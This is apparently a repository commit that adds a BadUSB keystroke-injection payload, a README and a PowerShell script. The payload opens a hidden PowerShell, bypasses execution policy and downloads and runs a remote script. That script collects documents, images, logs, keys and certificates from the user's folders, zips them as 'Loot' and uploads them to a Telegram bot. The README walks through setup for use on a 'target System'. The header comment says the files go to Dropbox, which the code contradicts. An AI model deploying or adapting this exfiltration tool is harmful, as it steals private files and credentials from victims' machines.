Add files via upload

Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt

@@ -0,0 +1,19 @@
+
+REM Title: beigeworm's Exfiltrate files to Telegram
+REM Author: @beigeworm
+REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace TELEGRAM_TOKEN with your Telegram Token.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex
+ENTER
+

Exfiltrate-to-Telegram/README.md

@@ -0,0 +1,14 @@
+
+<h2 align="center"> Exfiltrate Files to Telegram </h2>
+
+SYNOPSIS
+
+This script connects target computer with a telegram chat to upload certain files to telegram .
+
+SETUP INSTRUCTIONS
+
+1. visit https://t.me/botfather and make a bot.
+2. add bot api to script.
+3. search for bot in top left box in telegram and start a chat then type /start.
+4. Replace TELEGRAM_TOKEN with your token
+5. Run Script on target System

Exfiltrate-to-Telegram/main.ps1

@@ -0,0 +1,68 @@
+$Token = "$tg"
+$URL='https://api.telegram.org/bot{0}' -f $Token 
+
+while($chatID.length -eq 0){
+$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
+if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
+if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
+Sleep 10
+}
+
+Function Exfiltrate {
+
+param ([string[]]$FileType,[string[]]$Path)
+$maxZipFileSize = 50MB
+$currentZipSize = 0
+$index = 1
+$zipFilePath ="$env:temp/Loot$index.zip"
+$MessageToSend = New-Object psobject 
+$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID
+$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force
+irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json"
+
+If($Path -ne $null){
+$foldersToSearch = "$env:USERPROFILE\"+$Path
+}else{
+$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
+}
+
+If($FileType -ne $null){
+$fileExtensions = "*."+$FileType
+}else {
+$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
+}
+
+Add-Type -AssemblyName System.IO.Compression.FileSystem
+$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+$escmsg = "Files from : "+$env:COMPUTERNAME
+
+foreach ($folder in $foldersToSearch) {
+    foreach ($extension in $fileExtensions) {
+        $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse
+        foreach ($file in $files) {
+            $fileSize = $file.Length
+            if ($currentZipSize + $fileSize -gt $maxZipFileSize) {
+                $zipArchive.Dispose()
+                $currentZipSize = 0
+                curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
+                Remove-Item -Path $zipFilePath -Force
+                Sleep 1
+                $index++
+                $zipFilePath ="$env:temp/Loot$index.zip"
+                $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+            }
+            $entryName = $file.FullName.Substring($folder.Length + 1)
+            [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName)
+            $currentZipSize += $fileSize
+        }
+    }
+}
+$zipArchive.Dispose()
+curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
+Remove-Item -Path $zipFilePath -Force
+Write-Output "$env:COMPUTERNAME : Exfiltration Complete."
+}
+
+
+# Define What you want to search for (examples at the top)
+Exfiltrate -Path documents -FileType log